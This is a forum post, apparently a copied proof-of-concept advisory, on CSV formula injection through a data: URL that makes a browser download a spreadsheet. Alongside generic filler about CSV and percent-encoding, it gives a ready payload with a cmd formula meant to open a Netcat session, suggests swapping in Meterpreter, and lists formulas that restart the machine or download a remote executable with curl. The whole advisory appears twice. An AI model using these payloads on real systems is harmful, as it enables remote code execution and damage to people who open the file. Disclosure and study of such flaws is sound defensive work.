- Joined
- Dec 28, 2022
- Threads
- 10
- Likes
- 5
- Awards
- 4
- Website
- packetstormsecurity.com
- Credits
- 812©
- Cash
- 0$
====================================================================================================================================
| # Title : Utf-8 url Encoding CSV Injection without server interaction Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 109.0.3(64-bit) |
====================================================================================================================================
poc :
[+] CSV (Comma-Separated Values) is not a programming language,
but rather a file format that stores data in a tabular form,
where each row represents a record and each column represents a field within that record.
The values within each row are separated by a comma, hence the name "Comma-Separated Values."
CSV files can be read and written by a variety of programming languages, including but not limited to Python, Java, C++,
and JavaScript. These languages provide libraries and functions for reading and writing CSV files,
and can be used to process and manipulate the data stored in the file. However, the CSV file format itself is language-agnostic
and can be used with any programming language that can handle text files.
CSV files are an essential part of computer science when you work with websites and databases.
There might be some cases when the user has some data in the browser that you want to let them download this data.
In that case, CSV files help the programmer to use them to download the website data in tabular form.
Programmers use the CSV file format for the users to download the website data.
CSV is a simple and easy form to stores the website data in tabular form. With the help of JavaScript,
you can collect the data from the HTML page and create a CSV file or also create the data manually.
You can open the CSV file in MS-Excel and see the data present inside it.
Almost every database requires CSV files to back up the data.
To export the data from the website, programmers use CSV files. CSV files can be created and downloaded using JavaScript
Not all web browsers use the CSV format as a default, but all web browsers can open and display CSV files.
Browsers can open and display CSV files when they are downloaded to a computer or when a URL for the file is specified on the internet.
However, a certain number of browsers provide additional services for working with CSV files,
such as saving and editing services. Also, developers can create web applications based on modern browsers to analyze and display data
stored in CSV files in a more analytical and experimental way.
[+] UTF-8 URL encoding, also known as percent-encoding, is a method of encoding special characters in a URL
or URI (Uniform Resource Identifier). It is used to encode characters that are not allowed in a URL, such as spaces, special characters,
and non-ASCII characters, into a format that can be safely transmitted over the internet.
In UTF-8 URL encoding, each character is represented as a sequence of three characters: a percent sign (%),
followed by two hexadecimal characters that represent the character's numerical value in the UTF-8 encoding.
For example, the space character is represented as "%20".
UTF-8 URL encoding is important because it helps ensure that URLs and URIs are transmitted correctly across the internet
and can be safely used in web applications, APIs, and other internet-based systems.
It also helps ensure that URLs and URIs are consistent and compatible with different systems and languages,
as UTF-8 is a widely-used character encoding that supports a large number of characters from many languages.
[+] Payload : data:text/csv;charset=utf-8,%EF%BB%BFPacketStorm-Security%0AP0C%20By%20indoushka%202023%0A"=cmd|'/C/nc '!",%0AThank%20you%0A
[+] The following payload automatically configures and downloads a CSV file to the target computer without uploading the file to the online web server.
The file contains a command to open a pre-configured Netcat session, which will only open if the target opens the CSV file.
In case the target opens the CSV file, it will be able to access the command.
The Netcat command can be replaced with another payload, such as the MeterPreter.
[+] The payload contains codes utf-8 url Encoding :
20% to give space between letters or sentences.
%0A Moves to a new line .
[+] malicious code into a CSV "=cmd|'/C/nc '!",
So that the command line always opens in this path c:\windows\system32\cmd.exe ("=cmd| )
But here in this example we went back two paths in order to open the target application and the experiment was in my local server. ('/C/nc )
[+] Other commands can be selected, for example,
shutting down or restarting the computer : =cmd|'/C shutdown /r'!",
Or download files remotely : "=cmd|'/C curl https://files3.codecguide.com/klcp_update_1737_20221228.exe -o 1.exe '!",
[+] Downloaded files are always found in the Documents folder
https://c.top4top.io/m_2593xw0eb1.bmp
Greetings to :=============================================================================
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*|
===========================================================================================
| # Title : Utf-8 url Encoding CSV Injection without server interaction Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 109.0.3(64-bit) |
====================================================================================================================================
poc :
[+] CSV (Comma-Separated Values) is not a programming language,
but rather a file format that stores data in a tabular form,
where each row represents a record and each column represents a field within that record.
The values within each row are separated by a comma, hence the name "Comma-Separated Values."
CSV files can be read and written by a variety of programming languages, including but not limited to Python, Java, C++,
and JavaScript. These languages provide libraries and functions for reading and writing CSV files,
and can be used to process and manipulate the data stored in the file. However, the CSV file format itself is language-agnostic
and can be used with any programming language that can handle text files.
CSV files are an essential part of computer science when you work with websites and databases.
There might be some cases when the user has some data in the browser that you want to let them download this data.
In that case, CSV files help the programmer to use them to download the website data in tabular form.
Programmers use the CSV file format for the users to download the website data.
CSV is a simple and easy form to stores the website data in tabular form. With the help of JavaScript,
you can collect the data from the HTML page and create a CSV file or also create the data manually.
You can open the CSV file in MS-Excel and see the data present inside it.
Almost every database requires CSV files to back up the data.
To export the data from the website, programmers use CSV files. CSV files can be created and downloaded using JavaScript
Not all web browsers use the CSV format as a default, but all web browsers can open and display CSV files.
Browsers can open and display CSV files when they are downloaded to a computer or when a URL for the file is specified on the internet.
However, a certain number of browsers provide additional services for working with CSV files,
such as saving and editing services. Also, developers can create web applications based on modern browsers to analyze and display data
stored in CSV files in a more analytical and experimental way.
[+] UTF-8 URL encoding, also known as percent-encoding, is a method of encoding special characters in a URL
or URI (Uniform Resource Identifier). It is used to encode characters that are not allowed in a URL, such as spaces, special characters,
and non-ASCII characters, into a format that can be safely transmitted over the internet.
In UTF-8 URL encoding, each character is represented as a sequence of three characters: a percent sign (%),
followed by two hexadecimal characters that represent the character's numerical value in the UTF-8 encoding.
For example, the space character is represented as "%20".
UTF-8 URL encoding is important because it helps ensure that URLs and URIs are transmitted correctly across the internet
and can be safely used in web applications, APIs, and other internet-based systems.
It also helps ensure that URLs and URIs are consistent and compatible with different systems and languages,
as UTF-8 is a widely-used character encoding that supports a large number of characters from many languages.
[+] Payload : data:text/csv;charset=utf-8,%EF%BB%BFPacketStorm-Security%0AP0C%20By%20indoushka%202023%0A"=cmd|'/C/nc '!",%0AThank%20you%0A
[+] The following payload automatically configures and downloads a CSV file to the target computer without uploading the file to the online web server.
The file contains a command to open a pre-configured Netcat session, which will only open if the target opens the CSV file.
In case the target opens the CSV file, it will be able to access the command.
The Netcat command can be replaced with another payload, such as the MeterPreter.
[+] The payload contains codes utf-8 url Encoding :
20% to give space between letters or sentences.
%0A Moves to a new line .
[+] malicious code into a CSV "=cmd|'/C/nc '!",
So that the command line always opens in this path c:\windows\system32\cmd.exe ("=cmd| )
But here in this example we went back two paths in order to open the target application and the experiment was in my local server. ('/C/nc )
[+] Other commands can be selected, for example,
shutting down or restarting the computer : =cmd|'/C shutdown /r'!",
Or download files remotely : "=cmd|'/C curl https://files3.codecguide.com/klcp_update_1737_20221228.exe -o 1.exe '!",
[+] Downloaded files are always found in the Documents folder
https://c.top4top.io/m_2593xw0eb1.bmp
Greetings to :=============================================================================
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*|
===========================================================================================
